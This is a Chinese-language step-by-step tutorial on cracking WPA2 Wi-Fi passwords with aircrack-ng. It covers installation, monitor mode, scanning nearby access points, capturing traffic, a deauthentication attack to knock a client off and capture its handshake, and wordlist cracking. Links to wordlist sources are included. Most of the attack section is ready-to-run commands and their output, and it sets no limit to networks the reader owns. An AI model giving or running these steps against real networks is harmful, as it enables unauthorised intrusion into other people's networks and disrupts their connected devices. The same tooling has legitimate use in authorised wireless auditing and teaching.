1. 安装
首先安装两个扩展
sudo apt-get install build-essential
sudo apt-get install libssl-dev
然后到http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz 下载最新版的aircrack-ng,解压它
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1
gedit common.mak
找到 CFLAGS ?= -g -W -Wall -Werror -O3 并把它改为
CFLAGS ?= -g -W -Wall -O3
保存好后,开始编译安装
make
sudo make install
完了之后它会提示 Run ‘airodump-ng-oui-update’ as root (or with sudo) to install or update Airodump-ng OUI file (Internet connection required).
于是输入
sudo airodump-ng-oui-update
更新好后即可。
2. 启动无线网卡监控模式:
wy@wy-Inspiron-:~$ sudo airmon-ng start wlan0 Found processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
-e
PID Name
avahi-daemon
avahi-daemon
NetworkManager
wpa_supplicant
dhclient
Process with PID (dhclient) is running on interface wlan0 Interface Chipset Driver wlan0 Intel iwlwifi - [phy0]
(monitor mode enabled on mon0)
3. 扫描无线AP,找到满意的热点之后,ctrl+c终止扫描:
上部分为热点列表,下部分为连接在热点上的客户端的列表。
wy@wy-Inspiron-:~$ sudo airodump-ng mon0 CH ][ Elapsed: s ][ -- : BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID :::AA:XX: - 54e WPA2 CCMP PSK Netcore
D8::0D::XX:CA - 54e. WPA2 CCMP PSK TP-LINK_211CCA
:E6:E4::XX: - 54e. WPA2 CCMP PSK TP-LINK_936048
D8::0D:1B:XX:A6 - 54e. WPA2 CCMP PSK Wiann2061
::::XX: - 54e. WPA2 CCMP PSK kk-link
A4::::XX:CC - 54e WPA2 CCMP PSK mayouyou
::::XX:2C - 54e. WPA2 CCMP PSK 360WiFi-482C
CC::::XX: - - WPA <length: > BSSID STATION PWR Rate Lost Frames Probe ::::XX: :::AF:XX:4C 0e- 0e
CC::::XX: 8C:7B:9D::XX:3B - 0e-
CC::::XX: 0C:::2A:XX:E3 - 0e-
CC::::XX: 0C:::2A:XX:F4 - 0e- wy@wy-Inspiron-:~$
4. 抓包
sudo airodump-ng -c 6 –w longas mon0
这个窗口不要关。
参数解释:
-c 这里我们设置目标AP的工作频道,通过观察,我们要进行攻击测试的无线路由器工作频道为6;
-w 后跟要保存的文件名,这里w就是“write写”的意思,所以输入自己希望保持的文件名,这里我就写为longas。那么,小黑们一定要注意的是:这里我们虽然设置保存的文件名是longas,但是生成的文件却不是longas.cap,而是longas-01.cap。
5.攻击
sudo aireplay-ng -0 1 –a AP的mac -c 客户端的mac mon0
参数解释:
-0 采用deauth攻击模式,后面跟上攻击次数,这里我设置为1,大家可以根据实际情况设置为10不等;
-a 后跟AP的MAC地址;
-c 后跟客户端的MAC地址;
若第三步的窗口中出现握手包,表示攻击有效。
6. 破解
sudo aircrack-ng -w dic 捕获的cap文件
7. 破解完成之后关闭虚拟网卡mon0
wy@wy-Inspiron-:~$ sudo airmon-ng stop mon0 Interface Chipset Driver wlan0 Intel iwlwifi - [phy0]
mon0 Intel iwlwifi - [phy0] (removed)
字典文件下载地址:
http://bbs.ecjtu.org/thread-29817-1-1.html
http://www.aircrack-ng.org/doku.php?id=faq#where_can_i_find_good_wordlists
详细步骤查看:http://netsecurity.51cto.com/art/201105/264844_all.htm